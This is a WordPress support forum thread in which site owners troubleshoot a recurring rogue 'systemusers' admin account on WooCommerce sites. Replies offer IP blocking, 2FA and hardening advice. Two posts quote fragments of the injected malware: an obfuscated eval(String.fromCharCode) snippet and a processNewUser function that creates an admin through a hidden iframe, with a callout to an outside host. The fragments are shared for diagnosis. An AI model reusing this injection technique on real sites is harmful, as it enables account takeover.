Title: Admin User creating attack Last modified: October 2, 2019 --- # Admin User creating attack * [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 8 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/) * I am facing new admin user creation attack on one of my woocommerce site. The admin user are created with systemusers username and using [systemusers@gmailen.com](https://wordpress.org/support/topic/admin-user-creating-attack/systemusers@gmailen.com?output_format=md) as email address. After creating the user admin and user are getting new user created email notifications. Anyone here face this same problem before??how I can protect my site from this attack??? * When first time user created I found one vulnerable plugin on my site from wordfence scan I have deleted that plugin now and installed iTheme security pro version and enabled 2FA for admin users but after that still 5 times that user is creating on my site. Viewing 15 replies - 1 through 15 (of 20 total) 1 [2](https://wordpress.org/support/topic/admin-user-creating-attack/page/2/?output_format=md) [→](https://wordpress.org/support/topic/admin-user-creating-attack/page/2/?output_format=md) * [JNashHawkins](https://wordpress.org/support/users/jnashhawkins/) * (@jnashhawkins) * [6 years, 8 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11989872) * Block his IP address! * Block that email address. * Can he still get in as admin with 2FA? Call him!!! Fuss! * Can he do anything as admin? Or is this just annoying you? * [https://wordpress.org/support/article/hardening-wordpress/](https://wordpress.org/support/article/hardening-wordpress/) * Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11991881) * [@jnashhawkins](https://wordpress.org/support/users/jnashhawkins/) When i blocking their IP then they have creating new user using another IP. So IP blocking not providing solution for that. * Also when i checking the email log i can see that 2FA email are sending into their email address. * Yes he is installing new vulnerable plugin on my site and also he checking all pages and site settings on back-end. * [JNashHawkins](https://wordpress.org/support/users/jnashhawkins/) * (@jnashhawkins) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11992064) * Can you block per CIDR notation (range of) IPs instead of using a single IP? Or would that accidentally block some of your audience? * Have you asked the WordFence support? * Have you worked through the Hardening of WordPress link I sent you yet? Is the 2FA actually trapping him then calling him? I’d think that the phone number for the 2FA would be somewhere in your database if your 2FA is using SMS. I might be wrong there but worth a look. * Have you mentioned this problem to your web host? * Have you mentioned this to the 2FA provider? Or is that WordFence provided? * Maybe ask on stack exchange. * I still think the IP blocks and using the Hardening tips should get you there. * There are a couple more good ideas and a few plugins mentioned in this article, too. * [https://kinsta.com/blog/wp-admin-login/](https://kinsta.com/blog/wp-admin-login/) * If you keep blocking this person at every turn you’ll probably discourage him/ her at some point and they’ll move on to an easier target… so don’t give up! * Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11992361) * [@jnashhawkins](https://wordpress.org/support/users/jnashhawkins/) they are using different IP’s so we cant block particular range of ip they are using different range of IP. * No i didn’t contacted the WordFence support yet. * We have enabled 2FA by using iTheme pro security plugin. And we have enabled the 2FA by email notification so when admin user tried to login with correct user name password then next step they need to provide the 2FA code generated by iTheme security. * Yes i have contacted the webhost they are also dont know how the user creating on my site. * [JNashHawkins](https://wordpress.org/support/users/jnashhawkins/) * (@jnashhawkins) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11992461) * Oh, why not go with 2FA where the user logging in needs to provide a code via SMS? * That would be every time they log in. It’s a bit of a pain but might solve your problem pretty quickly. * [https://www.wpbeginner.com/plugins/how-to-add-two-factor-authentication-for-wordpress/](https://www.wpbeginner.com/plugins/how-to-add-two-factor-authentication-for-wordpress/) * Getting back to the IP address blocking. Just keep adding the IP address they use to login with each time. If you notice two adjacent IPs then look to creating a CIDR to block them. There is most likely a subnet that they are on unless they are spoofing IPs or running on botnets or proxies. * It’s highly unlikely the address they use would be the same as a regular user or else that might prompt the legit user to complain to their ISP which might help uncover your attacker once and for all. * I’d keep blocking. * [JNashHawkins](https://wordpress.org/support/users/jnashhawkins/) * (@jnashhawkins) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11992477) * I’d also keep calling my web host… Sometimes you’ll find a sympathetic ear who will escalate your problem to second level techs to help you more. The first level guys don’t always make the right determinations first time through either. * Keep hounding them and don’t let them sell you anything else until you are satisfied with what you have already paid for. * I have no idea who your host is but sometimes you need to ‘pick up and move’ or threaten to anyway. * Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11992984) * I found following code in Db eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, * bye checking this article * [https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/](https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/) - This reply was modified 6 years, 7 months ago by [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/). * [JNashHawkins](https://wordpress.org/support/users/jnashhawkins/) * (@jnashhawkins) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11998062) * Right. * Some of the technical ‘why’ explanations are interesting but the ‘hows’ usually boil down to the basics and repetition of those. Notice the mention of the IP address and I’m right tickled that WordFence tried to work with the host involve to deal with the real problem. * Also, consider the obfuscated code referenced can and most likely will change over time. The basics come back to help us though. * Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12057528) * The attack is comes back again i dont know how its happening. Anyone can help me to solve this attack ? * [nashe](https://wordpress.org/support/users/nashe/) * (@nashe) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097510) * [@saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) Hi! I encountered the same problem. An administrator user called systemusers has been created suddenly. I found that it’s link with the plugin WooCommerce PPOM( Personalized Product Option Manager) (Plugin adds input fields on product page to personalized your product.). When the plugin is activated, administrator “ systemusers” is created on a detailed product with additional field. In this case, servor try to connect on this address : [https://sslapis.com/counter.php](https://sslapis.com/counter.php). * the function called is contentLoaded, and somewhere in the script, we find a processNewUser function : * function processNewUser(adminhref){ var username = ‘systemusers’; var email = ‘systemusers@gmailen.com’; var password = ‘KYPzRkaJb0avdB’; * pfr=document.createElement(‘iframe’); pfr.style.visibility=’hidden’; pfr.name =’pfr’; pfr.src=adminhref+’/user-new.php’; * pfr.onload=function(state){ * pfr.onload=”; * At the moment I deactivated the script PPOM and it stops the administrator user creation. If someone has another idea … Thanx * Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097538) * [@nashe](https://wordpress.org/support/users/nashe/) PPOM Plugin creating that user ? - This reply was modified 6 years, 6 months ago by [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/). * [nashe](https://wordpress.org/support/users/nashe/) * (@nashe) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097589) * it’s seems it’s linked. it should not … PPOM is activated on your site ? * Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097592) * [@nashe](https://wordpress.org/support/users/nashe/) yes i activated PPOM for WooCommerce by N-MEDIA plugin on my site * [nashe](https://wordpress.org/support/users/nashe/) * (@nashe) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097624) * Try to test : – delete systemusers administrator (if notalready done …) on my side I let it existing with another email and without right. – show a product with additional fields – the systemusers should be created in your backend administration– delete systemusers – deactivate PPOM – and show the same product, without add fields of course, and the problem should be fixed * About sslapis but not with PPOM : [https://www.wordfence.com/blog/2018/11/xss-injection-campaign-exploits-wordpress-amp-plugin/](https://www.wordfence.com/blog/2018/11/xss-injection-campaign-exploits-wordpress-amp-plugin/) * Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097637) * [@nashe](https://wordpress.org/support/users/nashe/) Let me check - This reply was modified 6 years, 6 months ago by [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/). Viewing 15 replies - 1 through 15 (of 20 total) 1 [2](https://wordpress.org/support/topic/admin-user-creating-attack/page/2/?output_format=md) [→](https://wordpress.org/support/topic/admin-user-creating-attack/page/2/?output_format=md) The topic ‘Admin User creating attack’ is closed to new replies. ## Tags * [attack](https://wordpress.org/support/topic-tag/attack/) * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 20 replies * 3 participants * Last reply from: [nashe](https://wordpress.org/support/users/nashe/) * Last activity: [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/page/2/#post-12097681) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics